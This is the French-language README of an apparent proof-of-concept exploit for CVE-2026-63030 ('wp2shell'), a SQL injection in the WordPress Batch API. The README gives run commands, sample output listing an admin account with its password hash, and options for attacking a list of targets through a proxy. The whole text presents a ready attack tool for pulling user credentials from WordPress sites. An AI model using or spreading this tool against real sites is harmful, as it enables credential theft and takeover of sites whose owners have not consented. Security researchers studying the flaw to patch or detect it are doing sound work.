
CVE-2026-63030 (wp2shell) POC.
Exploit d'injection SQL par désynchronisation de l'API Batch WordPress
Outil de preuve de concept pour extraire les utilisateurs et les hashs de mots de passe via la vulnérabilité CVE-2026-63030 (wp2shell).
python POC.py <target_url> [options]
python POC.py --rest-route http://target.com
[*] Scanning: http://127.0.0.1/
[*] 1 users found
[+] ID:1 User:admin Hash:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] Requests: 553
| Argument | Description | Défaut |
|---|
target | URL cible unique | - |
-l, --list | Fichier contenant une liste de cibles (une par ligne) | - |
--prefix | Préfixe des tables de la base de données | wp_ |
--rest-route | Utiliser ?rest_route= | Désactivé |
--timeout | Délai d'expiration de la requête (secondes) | 30 |
--proxy | Proxy HTTP (compatible Burp/ZAP) | Aucun |
--max-len | Longueur maximale d'extraction | 255 |